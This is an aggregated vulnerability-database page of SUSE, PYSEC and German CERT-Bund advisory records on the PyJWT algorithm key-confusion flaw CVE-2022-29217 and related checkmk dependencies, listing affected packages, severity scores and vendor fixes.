title: "Security update for python-PyJWT", tracking: { current_release_date: "2022-07-14T15:00:26Z", generator: { date: "2022-07-14T15:00:26Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2022:2403-1", initial_release_date: "2022-07-14T15:00:26Z", revision_history: [ { date: "2022-07-14T15:00:26Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-PyJWT-1.7.1-150100.6.7.1.noarch", product: { name: "python2-PyJWT-1.7.1-150100.6.7.1.noarch", product_id: "python2-PyJWT-1.7.1-150100.6.7.1.noarch", }, }, { category: "product_version", name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", product: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", product_id: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 15 SP1", product: { name: "SUSE Linux Enterprise Module for Public Cloud 15 SP1", product_id: "SUSE Linux Enterprise Module for Public Cloud 15 SP1", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:15:sp1", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 15 SP2", product: { name: "SUSE Linux Enterprise Module for Public Cloud 15 SP2", product_id: "SUSE Linux Enterprise Module for Public Cloud 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-espos:15:sp1", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-ltss:15:sp1", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server 15 SP1-BCL", product: { name: "SUSE Linux Enterprise Server 15 SP1-BCL", product_id: "SUSE Linux Enterprise Server 15 SP1-BCL", product_identification_helper: { cpe: "cpe:/o:suse:sles_bcl:15:sp1", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server 15 SP1-LTSS", product: { name: "SUSE Linux Enterprise Server 15 SP1-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP1-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sles-ltss:15:sp1", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server for SAP Applications 15 SP1", product: { name: "SUSE Linux Enterprise Server for SAP Applications 15 SP1", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP1", product_identification_helper: { cpe: "cpe:/o:suse:sles_sap:15:sp1", }, }, }, { category: "product_name", name: "SUSE Enterprise Storage 6", product: { name: "SUSE Enterprise Storage 6", product_id: "SUSE Enterprise Storage 6", product_identification_helper: { cpe: "cpe:/o:suse:ses:6", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15 SP1", product_id: "SUSE Linux Enterprise Module for Public Cloud 15 SP1:python2-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python2-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 15 SP1", }, { category: "default_component_of", full_product_name: { name: "python2-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15 SP2", product_id: "SUSE Linux Enterprise Module for Public Cloud 15 SP2:python2-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python2-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise Server 15 SP1-BCL", product_id: "SUSE Linux Enterprise Server 15 SP1-BCL:python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server 15 SP1-BCL", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise Server 15 SP1-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server 15 SP1-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP1", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP1:python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server for SAP Applications 15 SP1", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150100.6.7.1.noarch as component of SUSE Enterprise Storage 6", product_id: "SUSE Enterprise Storage 6:python3-PyJWT-1.7.1-150100.6.7.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150100.6.7.1.noarch", relates_to_product_reference: "SUSE Enterprise Storage 6", }, ], }, vulnerabilities: [ { cve: "CVE-2022-29217", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29217", }, ], notes: [ { category: "general", text: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Enterprise Storage 6:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 15 SP1:python2-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 15 SP2:python2-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server 15 SP1-BCL:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP1:python3-PyJWT-1.7.1-150100.6.7.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2022-29217", url: "https://www.suse.com/security/cve/CVE-2022-29217", }, { category: "external", summary: "SUSE Bug 1199756 for CVE-2022-29217", url: "https://bugzilla.suse.com/1199756", }, { category: "external", summary: "SUSE Bug 1223417 for CVE-2022-29217", url: "https://bugzilla.suse.com/1223417", }, { category: "external", summary: "SUSE Bug 1226138 for CVE-2022-29217", url: "https://bugzilla.suse.com/1226138", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Enterprise Storage 6:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 15 SP1:python2-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 15 SP2:python2-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server 15 SP1-BCL:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP1:python3-PyJWT-1.7.1-150100.6.7.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Enterprise Storage 6:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 15 SP1:python2-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 15 SP2:python2-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server 15 SP1-BCL:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server 15 SP1-LTSS:python3-PyJWT-1.7.1-150100.6.7.1.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP1:python3-PyJWT-1.7.1-150100.6.7.1.noarch", ], }, ], threats: [ { category: "impact", date: "2022-07-14T15:00:26Z", details: "important", }, ], title: "CVE-2022-29217", }, ], }
suse-su-2022:2401-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-PyJWT", title: "Title of the patch", }, { category: "description", text: "This update for python-PyJWT fixes the following issues:\n\n- CVE-2022-29217: Fixed key confusion through non-blocklisted public key format (bsc#1199756).\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2022-2401,SUSE-SLE-Module-Public-Cloud-12-2022-2401", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2022_2401-1.json", }, { category: "self", summary: "URL for SUSE-SU-2022:2401-1", url: "https://www.suse.com/support/update/announcement/2022/suse-su-20222401-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2022:2401-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-July/011553.html", }, { category: "self", summary: "SUSE Bug 1199756", url: "https://bugzilla.suse.com/1199756", }, { category: "self", summary: "SUSE CVE CVE-2022-29217 page", url: "https://www.suse.com/security/cve/CVE-2022-29217/", }, ], title: "Security update for python-PyJWT", tracking: { current_release_date: "2022-07-14T14:57:07Z", generator: { date: "2022-07-14T14:57:07Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2022:2401-1", initial_release_date: "2022-07-14T14:57:07Z", revision_history: [ { date: "2022-07-14T14:57:07Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-PyJWT-1.5.3-3.16.1.noarch", product: { name: "python-PyJWT-1.5.3-3.16.1.noarch", product_id: "python-PyJWT-1.5.3-3.16.1.noarch", }, }, { category: "product_version", name: "python3-PyJWT-1.5.3-3.16.1.noarch", product: { name: "python3-PyJWT-1.5.3-3.16.1.noarch", product_id: "python3-PyJWT-1.5.3-3.16.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 12", product: { name: "SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:12", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-PyJWT-1.5.3-3.16.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12:python-PyJWT-1.5.3-3.16.1.noarch", }, product_reference: "python-PyJWT-1.5.3-3.16.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 12", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.5.3-3.16.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12:python3-PyJWT-1.5.3-3.16.1.noarch", }, product_reference: "python3-PyJWT-1.5.3-3.16.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 12", }, ], }, vulnerabilities: [ { cve: "CVE-2022-29217", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29217", }, ], notes: [ { category: "general", text: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-PyJWT-1.5.3-3.16.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 12:python3-PyJWT-1.5.3-3.16.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2022-29217", url: "https://www.suse.com/security/cve/CVE-2022-29217", }, { category: "external", summary: "SUSE Bug 1199756 for CVE-2022-29217", url: "https://bugzilla.suse.com/1199756", }, { category: "external", summary: "SUSE Bug 1223417 for CVE-2022-29217", url: "https://bugzilla.suse.com/1223417", }, { category: "external", summary: "SUSE Bug 1226138 for CVE-2022-29217", url: "https://bugzilla.suse.com/1226138", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-PyJWT-1.5.3-3.16.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 12:python3-PyJWT-1.5.3-3.16.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-PyJWT-1.5.3-3.16.1.noarch", "SUSE Linux Enterprise Module for Public Cloud 12:python3-PyJWT-1.5.3-3.16.1.noarch", ], }, ], threats: [ { category: "impact", date: "2022-07-14T14:57:07Z", details: "important", }, ], title: "CVE-2022-29217", }, ], }
pysec-2022-202
Vulnerability from pysec
PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify jwt.algorithms.get_default_algorithms()
to get support for all algorithms, or specify a single algorithm. The issue is not that big as algorithms=jwt.algorithms.get_default_algorithms()
has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.
Name | purl |
---|---|
pyjwt | pkg:pypi/pyjwt |
{ affected: [ { package: { ecosystem: "PyPI", name: "pyjwt", purl: "pkg:pypi/pyjwt", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "9c528670c455b8d948aff95ed50e22940d1ad3fc", }, ], repo: "https://github.com/jpadilla/pyjwt", type: "GIT", }, { events: [ { introduced: "1.5.0", }, { fixed: "2.4.0", }, ], type: "ECOSYSTEM", }, ], versions: [ "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.6.1", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "2.0.0", "2.0.0a1", "2.0.0a2", "2.0.1", "2.1.0", "2.2.0", "2.3.0", ], }, ], aliases: [ "CVE-2022-29217", "GHSA-ffqj-6fqr-9h24", ], details: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", id: "PYSEC-2022-202", modified: "2022-06-07T16:57:16.566102Z", published: "2022-05-24T15:15:00Z", references: [ { type: "ADVISORY", url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { type: "FIX", url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { type: "WEB", url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { type: "WEB", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { type: "WEB", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, ], }
wid-sec-w-2022-0456
Vulnerability from csaf_certbund
Notes
{ document: { aggregate_severity: { text: "hoch", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Checkmk ist eine IT-Monitoring-Software.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein Angreifer kann mehrere Schwachstellen in tribe29 checkmk ausnutzen, um einen nicht näher spezifizierten Angriff durchzuführen.", title: "Angriff", }, { category: "general", text: "- UNIX\n- Linux", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2022-0456 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-0456.json", }, { category: "self", summary: "WID-SEC-2022-0456 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0456", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:8861 vom 2022-12-08", url: "https://access.redhat.com/errata/RHSA-2022:8861", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:8852 vom 2022-12-08", url: "https://access.redhat.com/errata/RHSA-2022:8852", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3932-1 vom 2022-11-10", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-November/012870.html", }, { category: "external", summary: "CheckMK Werk #13904: Update vulnerable Python dependencies vom 2022-06-23", url: "https://checkmk.com/de/werk/13904", }, { category: "external", summary: "Ubuntu Security Notice USN-5526-1 vom 2022-07-20", url: "https://ubuntu.com/security/notices/USN-5526-1", }, { category: "external", summary: "Ubuntu Security Notice USN-5526-2 vom 2022-08-17", url: "https://ubuntu.com/security/notices/USN-5526-2", }, ], source_lang: "en-US", title: "tribe29 checkmk: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff", tracking: { current_release_date: "2022-12-07T23:00:00.000+00:00", generator: { date: "2024-08-15T17:29:16.374+00:00", engine: { name: "BSI-WID", version: "1.3.5", }, }, id: "WID-SEC-W-2022-0456", initial_release_date: "2022-06-23T22:00:00.000+00:00", revision_history: [ { date: "2022-06-23T22:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2022-07-05T22:00:00.000+00:00", number: "2", summary: "CHECKMK Referenz aufgenommen", }, { date: "2022-07-19T22:00:00.000+00:00", number: "3", summary: "Neue Updates von Ubuntu aufgenommen", }, { date: "2022-08-16T22:00:00.000+00:00", number: "4", summary: "Neue Updates von Ubuntu aufgenommen", }, { date: "2022-11-10T23:00:00.000+00:00", number: "5", summary: "Neue Updates von SUSE aufgenommen", }, { date: "2022-12-07T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, ], status: "final", version: "6", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, ], category: "vendor", name: "Red Hat", }, { branches: [ { category: "product_name", name: "SUSE Linux", product: { name: "SUSE Linux", product_id: "T002207", product_identification_helper: { cpe: "cpe:/o:suse:suse_linux:-", }, }, }, ], category: "vendor", name: "SUSE", }, { branches: [ { category: "product_name", name: "Ubuntu Linux", product: { name: "Ubuntu Linux", product_id: "T000126", product_identification_helper: { cpe: "cpe:/o:canonical:ubuntu_linux:-", }, }, }, ], category: "vendor", name: "Ubuntu", }, { branches: [ { branches: [ { category: "product_name", name: "tribe29 checkmk < 2.0.0p27", product: { name: "tribe29 checkmk < 2.0.0p27", product_id: "T023613", product_identification_helper: { cpe: "cpe:/a:tribe29:checkmk:2.0.0p27", }, }, }, { category: "product_name", name: "tribe29 checkmk < 2.2.0i1", product: { name: "tribe29 checkmk < 2.2.0i1", product_id: "T023614", product_identification_helper: { cpe: "cpe:/a:tribe29:checkmk:2.2.0i1", }, }, }, { category: "product_name", name: "tribe29 checkmk < 2.1.0p4", product: { name: "tribe29 checkmk < 2.1.0p4", product_id: "T023615", product_identification_helper: { cpe: "cpe:/a:tribe29:checkmk:2.1.0p4", }, }, }, ], category: "product_name", name: "checkmk", }, ], category: "vendor", name: "tribe29", }, ], }, vulnerabilities: [ { cve: "CVE-2020-25658", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2020-25658", }, { cve: "CVE-2021-34141", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2021-34141", }, { cve: "CVE-2021-41495", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2021-41495", }, { cve: "CVE-2021-41496", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2021-41496", }, { cve: "CVE-2022-29217", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2022-29217", }, { cve: "CVE-2022-29361", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2022-29361", }, { cve: "CVE-2022-30595", notes: [ { category: "description", text: "Es existieren mehrere Schwachstellen in tribe29 checkmk, die zum aktuellen Zeitpunkt nicht im Detail beschrieben und veröffentlicht wurden. Ein Angreifer kann diese Schwachstellen ausnutzen, um nicht näher spezifizierte Auswirkungen zu verursachen.", }, ], product_status: { known_affected: [ "T002207", "67646", "T000126", ], }, release_date: "2022-06-23T22:00:00.000+00:00", title: "CVE-2022-30595", }, ], }
WID-SEC-W-2022-0456
Vulnerability from csaf_certbund
Notes
{ document: { aggregate_severity: { text: "hoch", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Checkmk ist eine IT-Monitoring-Software.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein Angreifer kann mehrere Schwachstellen in tribe29 checkmk ausnutzen, um einen nicht näher spezifizierten Angriff durchzuführen.", title: "Angriff", }, { category: "general", text: "- UNIX\n- Linux", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2022-0456 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-0456.json", }, { category: "self", summary: "WID-SEC-2022-0456 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0456", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:8861 vom 2022-12-08", url: "https://access.redhat.com/errata/RHSA-2022:8861", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:8852 vom 2022-12-08", url: "https://access.redhat.com/errata/RHSA-2022:8852", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3932-1 vom 2022-11-10", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-November/012870.html", }, { category: "external", summary: "CheckMK Werk #13904: Update vulnerable Python dependencies vom 2022-06-23", url: "https://checkmk.com/de/werk/13904", }, { category: "external", summary: "Ubuntu Security Notice USN-5526-1 vom 2022-07-20", url: "https://ubuntu.com/security/notices/USN-5526-1", }, { category: "external", summary: "Ubuntu Security Notice USN-5526-2 vom 2022-08-17", url: "https://ubuntu.com/security/notices/USN-5526-2", }, ], source_lang: "en-US", title: "tribe29 checkmk: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff", tracking: { current_release_date: "2022-12-07T23:00:00.000+00:00", generator: { date: "2024-08-15T17:29:16.374+00:00", engine: { name: 